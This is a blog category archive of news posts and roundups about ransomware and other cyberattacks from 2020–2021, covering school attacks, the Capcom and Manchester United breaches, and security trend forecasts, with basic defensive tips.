Category Archives: ransomware

Ransomware provides the perfect cover

Look at any list of security challenges that CISOs are most concerned about and you’ll consistently find ransomware on them. It’s no wonder: ransomware attacks cripple organizations due to the costs of downtime, recovery, regulatory penalties, and lost revenue. Unfortunately, cybercriminals have added an extra sting to these attacks: they are using ransomware as a smokescreen to divert security teams from other clandestine activities behind the scenes. Attackers are using the noise of ransomware to … More

The post Ransomware provides the perfect cover appeared first on Help Net Security.

Most CISOs believe that human error is the biggest risk for their organization

53% of CISOs and CSOs in the UK&I reported that their organization suffered at least one significant cyberattack in 2020, with 14% experiencing multiple attacks, a Proofpoint survey reveals. This trend is not set to slow down, with 64% expressing concern that their organization is at risk of an attack in 2021. Those in larger organizations feel at greater threat, with this figure jumping to 89% amongst CSOs and CISOs from organizations over 2,500 employees … More

The post Most CISOs believe that human error is the biggest risk for their organization appeared first on Help Net Security.

Ransomware and DDoS is on the Rise: Tips for Distance Learning in 2021

Ransomware Alert

Ransomware and DDoS is on the Rise: Tips for Distance Learning in 2021

The holidays have come and gone, and students returned to the virtual classroom. But according to the FBI, cyberattacks are likely to disrupt online learning in the new year. As of December 2020, the FBI, Cybersecurity and Infrastructure Security Agency (CISA), and MS-ISAC continue to receive reports from K-12 educational institutions about the disruptions caused by cyberthreats, primarily ransomware and Distributed Denial of Service (DDoS). To protect their education and digital lives, distance learners will need to stay vigilant when it comes to ransomware and DDoS attacks. Let’s dive into the impact these threats have on the K-12 education system now that more people are plugged in as a result of distance learning.

Hackers Hold Education for Ransom

Of all the attacks plaguing K-12 schools this year, ransomware has been a particularly aggressive threat. Ransomware attacks typically block access to a computer system or files until the victim pays a certain amount of money or “ransom.” The FBI and the CISA issued a warning that showed a nearly 30% increase in ransomware attacks against schools. In August and September, 57% of ransomware incidents involved K-12 schools, compared to 28% of all reported ransomware incidents from January through July. And it’s unlikely that hackers will let up anytime soon. Baltimore County’s school system was recently shut down by a ransomware attack that hit all of its network systems and closed schools for several days for about 111,000 students. It wasn’t until last week that school officials could finally regain access to files they feared were lost forever, including student transcripts, first-quarter grades, and vital records for children in special education programs.

According to to ZDNet, the five most active ransomware groups targeting K-12 schools are Ryuk, Maze, Nefilim, AKO, and Sodinokibi/REvil. Furthermore, all five of these ransomware families are known to run “leak sites,” where they dump data from victims who don’t pay the ransom. This creates a particularly dangerous problem of having student data published online. To prevent distance learning disruption, students and educators need to understand the effects of ransomware on school systems and take steps to prevent the damage caused by this threat.

DDoS Attacks Disrupt the Distance Learning

An increase in ransomware attacks isn’t the only problem that K-12 schools are facing. The CISA and the FBI warned those participating in distance learning to protect themselves against other forms of cyberattacks such as Distributed Denial of Service (DDoS). DDoS is a method where hackers flood a network with so much traffic that it cannot operate or communicate as it normally would.

According to Dark Reading, Miami-Dade County Public Schools experienced significant disruptions during their first three days of distance learning for the 2020-2021 school year, thanks to a series of DDoS attacks. The school system stated it had already experienced more than a dozen DDoS attacks since the start of the school year. Sandwich Public Schools in Massachusetts were also knocked offline by a DDoS attack. When school systems fall victim to DDoS attacks, students can lose access to essential documents, files, or online platforms that they need to complete assignments. And with many students relying heavily on distance learning systems, losing access could put them behind.

Delete Disruptions: Follow These Security Tips

In an effort to create a standardized framework for dealing with ransomware attacks across verticals – including education – McAfee has teamed up with Microsoft to lead the Ransomware Task Force, along with 17 other security firms, tech companies, and non-profits. And while we’re taking critical actions to decrease the threat of ransomware attacks, there are other steps you can take to prevent ransomware and DDoS attacks from interrupting your distance learning experience. Follow these tips to take charge of your education and live your digital life free from worry:

Don’t pay the ransom

Many ransom notes seem convincing, and many only request small, seemingly doable amounts of money. Nevertheless, you should never pay the ransom. Paying does not promise you’ll get your information back, and many victims often don’t. So, no matter how desperate you are for your files, hold off on paying up.

Do a complete backup 

With ransomware attacks locking away crucial data, it’s important to back up your files on all your machines. If a device becomes infected with ransomware, there’s no promise you’ll get that data back. Ensure you cover all your bases and have your data stored on an external hard drive or in the cloud.

Use decryption tools

No More Ransom – an initiative that teams up security firms, including McAfee, and law enforcement – provides tools to free your data, each tailored for a specific type of ransomware. If your device gets held for ransom, start by researching what type of ransomware it is. Then, check out No More Ransom’s decryption tools and see if one is available for your specific strain.

Secure your router

Your Wi-Fi router is the gateway to your network. Secure it by changing the default password. If you aren’t sure how to do this, consult the internet for instructions on how to do it for your specific make and model, or call the manufacturer. Solutions like McAfee Secure Home Platform, which is embedded within select routers, can help you easily manage and protect your network from DDoS attacks and more.

Change default passwords on IoT devices

A lot of internet of things (IoT) devices come with default usernames and passwords. After taking your IoT device out of the box, the first thing you should do is change those default credentials. If you’re unsure of how to change the default setting on your IoT device, refer to setup instructions or do a bit of research online.

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

The post Ransomware and DDoS is on the Rise: Tips for Distance Learning in 2021 appeared first on McAfee Blogs.

Security is everyone’s priority

By Dana Mitchell, Director, Cybersecurity Solutions Group, Microsoft Canada Digital transformation, cloud computing and a sophisticated threat landscape are forcing everyone to rethink the roles that each individual within an organization has in defending against cyber threats. With billions of people around the globe working from home, changes to the daily practice of cybersecurity are…

The post Security is everyone’s priority first appeared on IT World Canada.

Out today: Defending against critical threats: A 12 month roundup

Inside, we take a retrospective look at cyber threats, and how they have evolved in the last 12 months. In something a little different to our previous reports, we’ve designed this in a magazine style format to include both interviews with security experts, and research driven features.

Our intention is to help inform strategic decision-making, as organizations prepare for threats they may encounter in the future. 

As a couple of callouts, we’ve included articles that address the ways cyber criminals sought to take advantage of the COVID-19 pandemic, be it through phishing campaigns, leveraging the great migration to remote work, or even going after health care organizations themselves.

Our interview with Esmond Kane, CISO for Steward Health Care, also shines a light on how COVID-19 impacted those on the security front line. 

In other topics, we’ve seen a large evolution in ransomware over the past year. Edmond Brumaghin, threat researcher for Cisco Talos, has pulled together some terrific research on Big Game Hunting attacks. This is when cyber criminals seek to monopolize a ransomware deployment by targeting backup systems, domain controllers, and other business-critical servers during a “post-compromise” phase. 

Our cover feature is the topic of election security. Cisco Talos spent four years conducting hands-on research into this field, and within this publication, we have an interview Matt Olney, Director of Talos threat intelligence and interdiction (who led this research) to capture his thoughts post-election. 

As our team were pulling this magazine together, what really struck me was that the topics illustrate how cyber threats impact our lives on a human level  from threats against our democracy, to our healthcare, to the organizations we work within. 

I hope you enjoy the read.

Click to read ‘Defending against critical threats: A 12 month roundup’

For more on these threat topics, take a listen to the latest episode of the Security Stories podcast.

Ben Nahorney, (my co-editor for the magazine), and I are joined live by Edmund Brumaghin to learn more about big game hunting attacks. Plus, we have the full interview with Esmond Kane to hear more about his experiences leading security on the front line of healthcare.

Listen below, or on on Apple PodcastsSpotifyGoogle Podcasts, or wherever you normally get your podcasts from.

 

How to defend against today’s top 5 cyber threats

Cyber threats are constantly evolving. As recently as 2016, Trojan malware accounted for nearly 50% of all breaches. Today, they are responsible for less than seven percent. That’s not to say that Trojans are any less harmful. According to the 2020 Verizon Data Breach Investigations Report (DBIR), their backdoor and remote-control capabilities are still used by advanced threat actors to conduct sophisticated attacks. Staying ahead of evolving threats is a challenge that keeps many IT … More

The post How to defend against today’s top 5 cyber threats appeared first on Help Net Security.

CAPCOM: 390,000 people impacted in the recent ransomware Attack

Capcom revealed that the recent ransomware attack has potentially impacted 390,000 people, an increase of approximately 40,000 people from the previous report.

In November, Japanese game developer Capcom admitted to have suffered a cyberattack that is impacting business operations.

The company has developed multiple multi-million-selling game franchises, including Street Fighter, Mega Man, Darkstalkers, Resident Evil, Devil May Cry, Onimusha, Dino Crisis, Dead Rising, Sengoku Basara, Ghosts ‘n Goblins, Monster Hunter, Breath of Fire, and Ace Attorney as well as games based on Disney animated properties.

At the time, the Notice Regarding Network Issues published by the company revealed that on the morning of November 2nd, 2020 is suffered a cyberattack, In response to the incident the game developer shut down portions of their corporate network to prevent the malware from spreading.

The incident has not impacted connections for its players, the company initially declared that had not found any evidence that customer data was stolen.

In Mid-November, the company confirmed that the attackers accessed the personal information of its employees, along with financial and business information. The company believes that other information potentially accessed includes sales reports, financial information, game development documents, other information related to business partners.

No credit card information was compromised in the security breach.

After the attack, the Ragnar Locker ransomware operators claimed to have stolen over 1TB of data from the company.

In an update published by the Ragnar ransomware gang on it leak site the operators leaked a collection of archives as proof of the hack.Greetings !

“Unfortunately even such worldwide leading company as CAPCOM doesn’t values much privacy and security. They was notified about vulnerability and data leak numerous time.” reads the post published by Ragnar gang on its leak site. They checked our page with proofs but even this didn’t help them to make a right decision and save data from leakage. Also we would help them to decrypt and also provide with recommendations on security measures improvement, to avoid such issues in future.” reads the post published by the ransomware on its leak site.

“We are sure that everyone should know about CAPCOM’s decision and careless attitude regarding data privacy. This might seems crazy in 21st century, all corporates should work harder on their security measures, especially IT and online based companies.”

CAPCOM

This week, Capcom provided an update on its investigation, that revealed the incident was worse than initially thought because the number of impacted people is larger than initially believed.

Capcom revealed that the personal information of 16,415 people was stolen by the ransomware gang. Impacted people includes 3,248 business partners, 9,164 former employees, and related parties, and 3,994 employees and related parties. Only 9 people were impacted.

“Further, because the overall number of potentially compromised data cannot specifically be ascertained due to issues including some logs having been lost as a result of the attack, Capcom has listed the maximum number of items it has determined to potentially have been affected at the present time.” reads the update published by the company.

Cumulative maximum number of potentially impacted people is 390,000, an increase of approximately 40,000 people from the previous report.

1. Information verified to have been compromised (updated)

i. Personal Information16,406 people *cumulative total since investigation began: 16,415 peopleBusiness partners, etc.: 3,248 people
At least one of the following: name, address, phone number, email address, etc.Former employees and related parties: 9,164 people
At least one of the following: name, email address, HR information, etc.Employees and related parties: 3,994 people
At least one of the following: name, email address, HR information, etc.
ii. Other InformationSales reports, financial information, game development documents, other information related to business partners

2. Potentially compromised data (updated)

i. Personal InformationApplicants: approx. 58,000 people
At least one of the following: name, address, phone number, email address, etc.*Cumulative maximum number of potentially compromised data for customers,
business partners and other external parties: 390,000 people*Regarding the cumulative maximum number of potentially compromised data above: as part of its ongoing investigation, Capcom has determined that it currently does not see evidence for the possibility of data compromise for the approximate 18,000 items of personal information from North America (Capcom Store member information and esports operations website members) that the company included in its November 16, 2020 announcement. As such, these have been removed from this cumulative maximum number of potentially compromised data.

The company pointed out that the investigation is still ongoing and that new fact may come to light.

“At this point in time, Capcom’s internal systems have in large part recovered, and business operations have returned to normal.” concludes the update.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, CAPCOM)

The post CAPCOM: 390,000 people impacted in the recent ransomware Attack appeared first on Security Affairs.

Smashing Security podcast #210: DC rioters ID’d, Energydots, and ransomware gets you in a pickle

Penile penal problems, identifying rioters in Washington DC, and can a sticker protect you from radiation? All this and much more is discussed in the latest edition of the award-winning "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by The Cyberwire's Dave Bittner. And don't miss our featured interview with CrowdSec's Philippe Humeau.

Ransomware gangs scavenge for sensitive data by targeting top executives

In their attempt to extort as much money as quickly as possible out of companies, ransomware gang know some effective techniques to get the full attention of a firm's management team. And one of them is to specifically target the sensitive information stored on the computers used by a company's top executives, in the hope of finding valuable data that can best pressure bosses into approving the payment of a sizeable ransom. Read more in my article on the Tripwire State of Security blog.

Ransomware Gangs Scavenge for Sensitive Data by Targeting Top Executives

In their attempt to extort as much money as quickly as possible out of companies, ransomware gangs know some effective techniques to get the full attention of a firm’s management team. And one of them is to specifically target the sensitive information stored on the computers used by a company’s top executives, in the hope […]… Read More

The post Ransomware Gangs Scavenge for Sensitive Data by Targeting Top Executives appeared first on The State of Security.

One month after ransomware attack, Metro Vancouver’s transit system still not up to speed

TransLink, Metro Vancouver’s public transportation agency, has warned its staff that hackers accessed their personal bank account details and other information. The warning came in an internal email to workers approximately one month after Translink was struck by the Egregor ransomware and passengers had their journeys disrupted. Read more in my article on the Hot for Security blog.

Cyber Security Roundup for January 2021

A suspected nation-state sophisticated cyber-attack of SolarWinds which led to the distribution of a tainted version the SolarWinds Orion network monitoring tool, compromising their customers, dominated the cyber headlines in mid-December 2020.  This was not only one of the most significant cyberattacks of 2020 but perhaps of all time. The United States news media reported the Pentagon, US intelligence agencies, nuclear labs, the Commerce, Justice, Treasury and Homeland Security departments, and several utilities were all compromised by the attack. For the full details of the SolarWinds cyber-attack see my article Sunburst: SolarWinds Orion Compromise Overview

Two other cyberattacks are possibly linked to the SolarWinds hack was also reported, the cyber-theft of sophisticated hacking tools from cybersecurity firm FireEye, a nation-state actor is suspected to be responsible. And the United States National Security Agency (NSA) advised a VMware security vulnerability was being exploited by Russian state-sponsored actors.

Amidst the steady stream of COVID-19 and Brexit news reports, yet another significant ransomware and cyber-extortion attack briefly made UK headlines. Hackers stole confidential records, including patient photos, from UK cosmetic surgery chain 'The Hospital Group', and threatening to publish patient's 'before and after' photos. The UK cosmetic surgery firm, which has a long history of celebrity endorsements, confirmed it was the victim of a ransomware attack, and that it had informed the UK's Information Commissioner's Office about their loss of personal data.

Spotify users had their passwords reset after security researchers alerted the music streaming platform of a leaky database which held the credentials of up to 350,000 Spotify users, which could have been part of a credential stuffing campaign. Security researchers at Avast reported 3 million devices may have been infected with malware hidden within 28 third-party Google Chrome and Microsoft Edge extensions.

A McAfee report said $1 Trillion was lost to cybercrime in 2020, and companies remained unprepared for cyberattacks in 2021.

Stay safe and secure.

BLOG

VULNERABILITIES AND SECURITY UPDATES
AWARENESS, EDUCATION AND THREAT INTELLIGENCE

    Trends in IT-Security and IAM in 2021, the “New Normal” and beyond

    Article by Dennis Okpara, Chief Security Architect & DPO at IDEE GmbH

    Yes, there is hope for 2021, but the challenges of the “New Normal” are here to stay. CISOs have to prepare and start acting now, because cybersecurity and the IT-infrastructure will have to face threats that have only just started.

    The year 2020 was the year working from home lost its oddity status and became normality. Big names like Google and Twitter are planning long-term and hold out the prospect of working from home on a permanent basis. More than 60 percent of companies are trying the same and have implemented home office policies in 2020. But with great flexibility comes great responsibility: Everyone responsible for Cybersecurity and a secure IT infrastructure is now dealing with new challenges closing the last gaps and weak points when it comes to allowing access to company resources. Dennis Okpara, Chief Security Architect & DPO at IDEE GmbH, the specialist for secure identity access management (IAM), authentication and authorization, shows the top 3 issues CISOs have to look out for:

    1. The Problem with Insider Threats will only get Worse
    With more and more people working from home, the use of personal devices and working on private networks only increases and further fuels the risk of insider threats. This does not come as a surprise. As early as in 2018, Verizon's Data Breach Investigation Report already recorded an increase in threats from "internal actors," meaning employees who knowingly or unknowingly illegally disseminated data and other company information. According to the 2020 report, insiders were responsible for a data breach in a flabbergasting 30% of cases.

    The case of Twitter in the summer of 2020 illustrates the damage vividly an insider threat can create. Hackers used social engineering to exploit the insecurity of IT employees and thus gain access to internal systems. Of course, it is quite unlikely that any of Twitter’s employees acted with malicious intent, still, they became the tool for an attack. The result: although the ATOs (Account Take Over) was used for fairly obvious scam posts, the attackers captured well over $100,000.

    No company is immune to such attacks, and even strict cybersecurity policies have little effect because they are very difficult to enforce or monitor when people are working from home. Therefore, it can be assumed that the number of insider threats will increase by more than 20% in 2021.

    2. Ransomware and Shadow-IT are bound to become the CISOs nightmare
    Working from home came suddenly for most companies and pretty much overnight, and even still, most corporations are not sufficiently prepared for the challenges that lie ahead. Unlike in the office, where the IT department can reasonably reliably control the distribution of software on employee PCs, the use of home networks and private devices opens up new attack vectors for hackers.

    Employees often use third-party services, download free software, or use private cloud services as a workaround when corporate services are not available. The storage of documents, access to data or other sensitive information on private devices will also continue to increase without CISOs being able to control this. Since private devices and networks are usually inadequately protected, they serve as a gateway for ransomware, which then attacks corporate networks, encrypts data and extorts high ransoms. Gartner analysts have already predicted a 700% increase in 2017 - the growth from the New Normal will dwarf those numbers and give CISOs many sleepless nights. Due to system and network vulnerabilities, misconfigurations, phishing, and the increase in credential attacks, we will likely see an exponential increase in ransomware attacks in 2021.

    3. Mobile Devices Become a Favourite Target for Hackers
    Developments such as multi-factor authentication (MFA) is improving the security of access to corporate services. On the flip side, it has put mobile devices in the crosshair of hackers. As smartphones are now practical for almost all online activities, the number of attack vectors has grown steadily along with them. In addition to malware, which can be easily installed via third-party apps, especially on Android, and data manipulation or the exploitation of recovery vulnerabilities (such as the interception of magic links or PIN text messages), social engineering is a particularly popular field here.

    In addition to the widespread phishing e-mail, vishing (manipulation of employees by fictitious calls from IT staff) and smishing (which works similarly to phishing but uses SMS instead of e-mail) will increase sharply. Hackers will come up with new tricks to compromise mobile devices, and that can only make digital fraud worse.

    2021: The Year We Abolish Trust
    In a year in which we will have to learn a lot of things anew, CISOs are well-advised to not build anything on trust – neither their network infrastructure nor their IAM. Zero-trust architectures that question all access to corporate resources must become the standard in the age of the New Normal. Restricting resource access to a physical address or IP address, or to VPN access, is counterproductive and difficult to manage if employees are to work from remote locations. Digital identity will shift from user identity to the combined identity of the device and the user. Only this will enable modern and secure identity & access management.

    A Review of Ransomware in 2020

    As if dealing with COVID-19 were not enough, 2020 turned out to be a banner year for another troublesome strain of virus— ransomware. Malicious actors grew more sophisticated, daring and brutal. They also hit a number of high-profile targets. For those of you who didn’t keep up with all of the developments in the ransomware […]… Read More

    The post A Review of Ransomware in 2020 appeared first on The State of Security.

    Six Trends Shaping the 2021 Cybersecurity Outlook

    Article by Tom Kellerman, Head of Cybersecurity Strategy, Rick McElroy, Head of Security Strategy and Greg Foss, Senior Cybersecurity Strategist, VMware Carbon Black

    Everything is different, and yet the same. As we look ahead to the cybersecurity landscape in the next 12 months, it is from a position no one predicted this time last year. Business operations have changed beyond recognition with most employees working from home in a transition that happened almost overnight. Stretched security teams have been challenged to rapidly deploy robust remote working facilities to maintain productivity. Most were writing the ‘pandemic playbook’ as they went along.

    Ironically, one of the few certainties of the situation was that cybercriminals would take advantage of disruption to escalate campaigns. In that sense, nothing changed, except that the opportunity was suddenly much greater. As a result, nine in ten security professionals surveyed by our Threat Analysis Unit said they were facing increased attack volumes, which they attributed to the newly distributed working environment.

    The effects of COVID-19 will continue to impact the cybersecurity sector for some time, but they are not the only considerations. This year we’ve seen cybercrime and cybercriminal groups continue along a path of technical and industry innovation that will see new strategies and tactics gain traction in 2021. We have also seen cyber defences tested like never before and, for the most part, they have held firm; there is reason for cybersecurity professionals to be optimistic.

    With this in mind, the following are six trends we expect to see, and key areas cybersecurity professionals should keep their eyes on in 2021.

    1. Remote-Working Focuses Attacker Attention on Mobile Compromise
    As business becomes more mobile than ever and remote working persists, mobile devices and operating systems will be increasingly targeted. As employees use personal devices to review and share sensitive corporate information, these become an excellent point of ingress for attackers. If hackers can get into your Android or iPhone, they will then be able to island-hop into the corporate networks you access, whether by deactivating VPNs or breaking down firewalls.

    We will also see hackers using malware such as Shlayer to access iOS, ultimately turning Siri into their personal listening device to eavesdrop on sensitive business communications.

    Combating these risks requires a combination of new mobile device policies and infrastructure designed to facilitate continued remote working, as well as raising employee awareness of the persistent risks and the importance of digital distancing.

    2. Continuing Direct Impacts on Healthcare
    In terms of direct impact of COVID-19 the healthcare sector, at the heart of crisis response, will see the adaptations it made to try and maintain patient services become a vulnerability. With growing reliance on telemedicine for routine medical appointments lucrative personally identifiable information (PII) is being accessed from remote locations and as a result is more easily intercepted by hackers. At the same time, vaccine-related data pertaining to trials and formulae is some of the most sought-after intellectual property right now and the drive to get hold of it for financial or political gain is putting healthcare and biotech organisations under intense pressure from external threats and insider risk.

    That said, the strain on healthcare cybersecurity is not going unheeded; we will see increased IT and security budgets in the sector to combat the growth in external threats.

    3. Emerging Tactical Trends: Cloud-Jacking and Destructive ICS Attacks
    As the new year dawns, we will see tried and tested tactics evolving to become more sophisticated and take advantage of changes in network architecture. Cloud-jacking through public clouds will become the island-hopping strategy of choice for cybercriminals as opportunity proliferates due to the overreliance on public clouds by the newly distributed workforce.

    It won’t be only the virtual environment under threat. Increasing cyber-physical integration will tempt nation state-sponsored groups into bolder, more destructive attacks against industrial control system (ICS) environments. Critical National Infrastructure, energy and manufacturing companies will be in the crosshairs as OT threats ramp up. Our analysts are seeing new ICS-specific malware changing hands on the dark web and we are likely to see it in action in the coming year.

    4. The Ransomware Economy Pivots to Extortion and Collaboration
    Another familiar tactic taking on a new twist is ransomware. Ransomware groups have evolved their approach to neutralise the defensive effect of back-ups and disaster recovery by making sure they’ve exfiltrated all the data they need before the victim knows they’re under attack. Once the systems are locked attackers use the data in their possession to extort victims to pay to prevent the breach becoming public. And if that fails, they can sell the data anyway, meaning the victim is doubly damaged.

    Ransomware is such big business that the leading groups are collaborating, sharing resources and infrastructure to develop more sophisticated and lucrative campaigns. Not all collaborations will be successful, however, and we’ll see groups disagreeing on the ethics of targeting vulnerable sectors such as healthcare.

    5. AI Utilised for Defensive and Offensive Purposes
    Technology innovation is as relevant to attackers as it is to defenders and, while artificial intelligence and machine learning have significant benefits in cybersecurity, we can expect to see adversaries continue to advance in the way AI/ML principles are used for post-exploitation activities. They’ll leverage collected information to pivot to other systems, move laterally and spread efficiently – all through automation.

    The silver lining is that in 2021 defenders will begin to see significant AI/ML advancements and integrations into the security stack. Security automation will be simplified and integrated into the arsenal of more organisations – not just those with mature SOCs. As awareness of how attackers are using automation increases, we can expect defenders to fix the issue, maximising automation to spot malicious activity faster than ever before.

    6. Defender Confidence is Justifiably on the Rise
    To finish on a resoundingly positive note, this year we saw cyber defences placed under inconceivable strain and they flexed in response. Yes, there were vulnerabilities due to the rapidity of the switch to fully remote working, but on the whole security tools and processes are working. Defender technology is doing the job is it designed to do and that is no small feat.

    The mission-critical nature of cybersecurity has never been more apparent than in 2020 as teams have risen to the challenge of uniquely difficult circumstances. In recognition of this we will see board-level support and a much healthier relationship between IT and security teams as they collaborate to simultaneously empower and safeguard users. 2020 has been the catalyst for change for which we were more than ready.

    Cyber Security Roundup for December 2020

    A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, November 2020.

    Manchester United FC remains impacted by a seemly major cyber-attack, which I covered in a blog post titled The Multi-Million Pound Manchester United Hack. At this point, United have provided few details about their cyber-attack which has been impacting club's IT systems for well over a week. However, the UK media are widely reporting United's leaky IT defences was unable to prevent a ransomware attack and data theft.  London's Hackney Borough Council have also been tight-lipped about what they describe as "a serious cyber-attack" which has impacted its service delivery to Londoners. Like United, this attack has all the hallmarks of a mass ransomware outbreak. Both Manchester United and Hacknet Council said they are working UK's National Cyber Security Centre (NCSC).

    Man.Utd hit by ransomware, who's next?

    Street Fighter games maker Capcom also reported to be compromised by a ransomware attack, with up to 350,000 people said to be affected, along some of Capcom's financial information stolen. The Ragnar locker hacker group were said to be behind the attack, although indications are that Capcom hasn't given in to their ransom demands after an ominous message appeared on the Ragnar group's website, which said Capcom didn't "make a right decision and save data from leakage". 

    The ransomware attacks will be going from bad to worse in 2021 according to Sophos. In its annual threat report, Sophos anticipates ransomware tactics, techniques and procedures are to become more evasive, with criminal threat actor operating more like nation-state attackers. Sophos also expects an increase in the number of entry-level, apprentice-type attackers looking for menu-driven, ransomware-for-rent, meaning the technical barrier preventing general nefarious folk orchestrating ransomware attacks is getting lower.

    Its likely COVID-19 has saved Ticketmaster from a more substantial DPA/GDPR fine after the Information Commissioners Office (ICO) announced it had fined the gig ticket selling company a mere £1.25 million for failing to keep 9 million of its customer's personal data and payment cards secure.  The ICO investigation concluded a vulnerability in a third-party chatbot installed on Ticketmaster's online payments page was exploited and used to access its customer card payment details. Following the breach, 60,000 Barclays bank customers were victims of fraud, while online bank Monzo had to replace 6,000 payment cards due to fraud. Ticketmaster said it would appeal against the ICO ruling. 

    An interesting new UK law is in the offing which proposes fines of 10% of turnover or more than £100,000 a day for telecoms operators that use of Huawei network equipment within their 5G networks. The bill provides the UK government new powers to force out Huawei usage with the UK telecoms giants, the threatened sum of £100,000 a day would only be used in the case of "continuing contravention" according to number 10.

    Consumer group Which warned security flaws in popular smart doorbells are placing UK consumers at risk. The watchdog tested 11 smart doorbell (IoT) devices purchased from popular online marketplaces like Amazon, the dodgy products were said to have been made by Qihoo, Ctronics and Victure. The most common security flaws found by Which were weak password policies and a lack of data encryption. Two of the devices could be manipulated to steal network WiFi passwords, providing the opportunity for an attacker to then hack other smart devices within the home.

    The NCSC released its annual review, confirming what we already know about the commonality of ransomware attacks on UK organisations.  The NCSC also accused Russia of trying to steal vaccine-related information through cyber-espionage, advising an "ongoing threat" of nation-states targeting the UK vaccine research-and-delivery programmes. The NCSC were not alone in pointing the finger at nation-state threat actors going after COVID-19 vaccines, Microsoft also reported state-backed hackers from Russian and North Korea were targeting organisations working on a coronavirus vaccine. The Russian group "Fancy Bear" and North Korean groups "Zinc" and "Cerium" were fingered by Microsoft as the culprits behind a spate recent cyber-attacks. Microsoft said Fancy Bear were brute-forcing accounts with millions of different passwords combinations, while North Korean groups sent spear-phishing emails posing as World Health Organisation officials, in an attempt to trick researchers into handing over their login credentials and research data. 

    Stay safe and secure.

    BLOG

    VULNERABILITIES AND SECURITY UPDATES
    AWARENESS, EDUCATION AND THREAT INTELLIGENCE

      The Multi-Million Pound Manchester United Hack

      Earlier this year I wrote a blog post about the Manchester City Billion Pound Hack, which explored cyberattacks within elite football. Now it is the turn of City big rivals Manchester United, after they reported their IT systems had been impacted by a cyber-attack, widely reported in the UK media as a cyber-extortion attack.

      In the last couple of years, cybercriminals have significantly ramped up efforts in targeting UK businesses with cyber extortion attacks, using ransomware malware and confidential data theft to leverage their victims into paying large ransom payments anonymously in Bitcoin. Many businesses have been quick to pay out ransoms after their operations ground to halt due to their IT systems being rendered unusable due to ransomware, and also to avoid dumping their confidential data on the internet by the cybercriminals.  

      In July 2020 the UK National Cyber Security Centre (NCSC) specially warned that cybercriminals were targeting UK sports teams with ransomware attacks in a report. This NCSC report cited a ransomware attack against an unnamed English Football League club, which crippled their  IT systems to the extent it stopped their turnstiles from working and almost led to the cancellation of the league fixture, which would have cost the club hundreds of thousands of pounds in lost income. NCSC reported it suspected cyber attackers gained access to the football club's network either by a phishing email or by remote access system connected to the club's CCTV system. That access was used to spread ransomware across the entire football club IT network.  It is understood the cybercriminals behind the attack demanded 400 bitcoin (over £300,000), which was not paid.  It seems Manchester United have been targeted similarly

      In a statement on 20th November 2020, Manchester United stated, 

      'Manchester United can confirm that the club has experienced a cyber attack on its systems. The club has taken swift actions to contain the attack and is currently working with expert advisers to investigate the incident and minimize the ongoing IT disruption.

      Although this is a sophisticated operation by organized cyber criminals, the club has extensive protocols and procedures in place for such an event and had rehearsed for this risk. Our cyber defenses identified the attack and shut down affected systems to contain the damage and protect data.'

      Despite the assurances in the statement the cyber-attack does appear to be contained and recovered from as yet, as both the Daily Mirror and the Daily Mail reported on 28th and 29th November 2020 respectively, that hackers had accessed the clubs scouting system's 'confidential information on targets and scouting missions'.  Several UK newspapers also reported the club's email system remains disabled.

      As yet, no details have been released about the cyberattack ingress method, the malware used or the suspected perpetrators behind the attack, when asked for details Man Utd stated 'The club will not be commenting on speculation regarding who may have been responsible for this attack or the motives behind it.'  Without any details of the cyberattack released by the club or leaked, at this stage it's difficult to draw any conclusions, but we can speculate.  

      The likely suspect is a variant of the Ryuk ransomware, possibly orchestrated by Ryuk criminal group, together with the recently reported resurgence of the Emote trojan last month, Emote is a common dropper of ransomware. It was a new variant of the Ryuk ransomware that was behind a cyberattack on digital services firm Sopra Steria in October 2020. Another common ransomware culprit is Trickbot, however, Microsoft and their partners took action last month to disrupt Trickbot botnet.

      No details have been released on how much this incident is costing Manchester United nor the ransom fee being demanded.  The media have speculated the ransom fee to be in the millions, likely based on that recent NCSC report, which stated an EFL club faced a £5 million ransom from cyber attackers.

      If this attack is found to have breached Manchester United fans data protection rights under the UK Data Protection Act (GDPR), the club could face a fine of up to £18m or 2% of their total annual worldwide turnover by the UK Information Commissioner's Office.  Further, given Manchester United are listed on New York Stock Exchange, the club could face additional US legislation if they decide to pay the ransomware fee, that fine could be up to £15m ($20m).

      The US Office of Foreign Assets Control (OFAC) warned that paying the ransom demand would only boost the criminals’ finances and encourage them to strike again elsewhere, stating, 

      ‘Facilitating a ransomware payment that is demanded as a result of malicious cyber activities may enable criminals and adversaries with a sanctions nexus to profit and advance their illicit aims.

      Ransomware payments may also embolden cyber actors to engage in future attacks'

      The last sentence of the OFAC statement is an essential point, given many organisations are giving in to cyber-extortion demands and paying up, it is fuelling further attacks.  

      If it was made illegal in the UK to pay a cyber extortion payment, that law would both remove the temptation of giving up on recovery and paying ransoms, but also push UK organisations into investing and deploying the appropriate level of cybersecurity controls to counter the risk, as there are simple security controls which can adequately thwart the risk of successful ransomware and data theft attacks. The simple truth is most ransomware and data theft attacks aren't really 'sophisticated', successful attacks can be prevented applying security control basics, such as continually patching IT systems (esp. internet-facing remote access VPN appliances), deploying and keeping anti-virus up-to-date, blocking external suspicious emails, and ensuring staff have a good level of security awareness, particularly in their ability to spotting phishing emails.

      Without pushing down global criminal threat actors 'Reward Vs Effort' reasoning, we can expect to see further high-profile businesses like Manchester United targeted with cyber extortion attacks, which ultimately causes significant reputational and financial damage on their organisation.

      Cyber Security Roundup for November 2020

      A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, October 2020.

      London's Hackney Borough Council has been tight-lipped about "a serious cyber-attack" which took down its IT systems, impacting its service delivery to citizens. Providing scant information about the attack, but it does have all the hallmarks of a ransomware outbreak. The council says it is working with the UK's National Cyber Security Centre (NCSC) and the Ministry of Housing to investigate and understand the impact of the incident. Ransomware attacks continue to be a major blight for UK public services, with councils to hospitals struggling to defend their IT systems against ransomware. Earlier this year Redcar and Cleveland Borough Council said it had been hit by a ransomware attack, which cost it more than £10m.

